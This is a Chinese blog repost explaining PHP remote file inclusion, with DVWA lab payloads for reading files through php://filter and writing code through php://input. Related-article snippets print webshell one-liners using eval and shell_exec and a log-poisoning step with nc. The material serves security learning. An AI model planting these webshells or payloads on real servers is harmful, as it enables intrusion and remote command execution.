远程文件包含

最新推荐文章于 2023-09-12 16:58:40 发布
最新推荐文章于 2023-09-12 16:58:40 发布
阅读量1.1k 收藏 1
点赞数
文章标签: php 运维
原文链接:http://www.cnblogs.com/happystudyhuan/p/11434763.html
版权

PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。

allow_url_fopen = On 是否允许打开远程文件
allow_url_include = On 是否允许include/require远程文件

注意:如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件

例如:我们用windows server 2003 服务器包含一个Linux上的phpinfo.php文件,那么得到的就是Linux的php配置文件,而不是Windows上的php配置文件。

 

使用PHP封装协议读取文件和写入PHP文件
1.读取文件
先看看读取文件,如输入page参数值为:php://filter/read=convert.base64-encode/resource=../../../../../var/www/dvwa/hackable/uploads/1.txt
格式为上
2.写入文件
前提条件是allow_url_include为on,则构造如下URL:192.168.220.128/dvwa/vulnerabilities/fi/?page=php://input
然后再POST需要输入的内容即可,这里通过Firefox的HackBar来POST数据

转载于:https://www.cnblogs.com/happystudyhuan/p/11434763.html

weixin_38166557
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程文件包含漏洞
Ethan024的博客
04-08 750
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
远程执行文件包含
weixin_30347335的博客
01-08 280
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
网络安全系列之三十 远程文件包含***
weixin_33928137的博客
11-08 256
远程文件包含***Remote File Include,它也属于是“代码注入”的一种,其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的,本文只介绍PHP文件包含漏洞。本次实验需要使用2台Web服务器,实验环境如下:Web1,IP地址192.168.80.129,利用NPMserv搭建php网站。Web2,IP地址192...
html 远程包含,文件包含远程文件包含
weixin_35042546的博客
06-23 359
远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 offowasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可这里使用apache;开启服务我们在网站的主目录下建立一个文件,webshell...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要包含文件路径时,如果这种输入没有经过充分验证,攻击者就能利用此漏洞执行任意代码。 首先,我们需要了解PHP配置选项。`allow_url_include`和`allow...
信息安全技术:远程文件包含漏洞.pptx
11-01
【信息安全技术:远程文件包含漏洞】 远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非...
PHP远程文件包含
04-29
当这些函数被用来包含一个远程文件时,若对传入的参数不做任何检查或仅做简单检查,就可能引发远程文件包含漏洞。攻击者可以通过向服务器发送恶意请求,诱导服务器加载指定的远程文件,进而控制服务器的行为。 ####...
文件包含漏洞详解
热门推荐
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1435
Web安全领域的探索之远程文件包含漏洞(LFI)
远程文件包含实操
东隅的博客
07-01 231
远程文件包含实操
文件上传漏洞之——远程文件包含漏洞(RFI)
wsnbbz的博客
03-04 4628
定义 如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令 原理 同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含文件不能为php文件,可写成txt或者图片马等等 文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行 复现 dvwa lo...
36、远程文件包含漏洞
weixin_41489908的博客
02-07 440
环境:DVWA,low级别 1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128 将yc.jpg照片拖入edjpgcom软件,添加下面这句话 <?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?> 2、访问一下该图片:http://192.168.152.128/yc.jpg 3...
iwebsec靶场 文件包含漏洞通关笔记4-远程文件包含
mooyuan的博客
09-12 513
远程文件包含文件包含漏洞的其中一种。这种漏洞在文件的URI位于其他服务器上并作为参数传递给PHP函数“include”,“include_once”,“require”,或“require_once”的情况下可能会出现。
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2216
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
web安全--文件包含(本地包含远程包含
nareku的博客
04-05 4406
前言 文件包含漏洞简介: 文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。 一.文件包含漏洞常见的函数(默认都以php脚本为准啊) ①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行 ②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。 ③require :
FileInclude
hee_mee的博客
01-07 1306
zeronil
dvwa远程文件包含
最新发布
09-26
远程文件包含是DVWA中的一个漏洞。远程文件包含漏洞允许攻击者通过传递恶意URL参数来包含远程文件,从而执行任意代码或获取敏感信息。 在DVWA中,远程文件包含漏洞可以通过修改URL参数来利用。攻击者可以通过传递...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值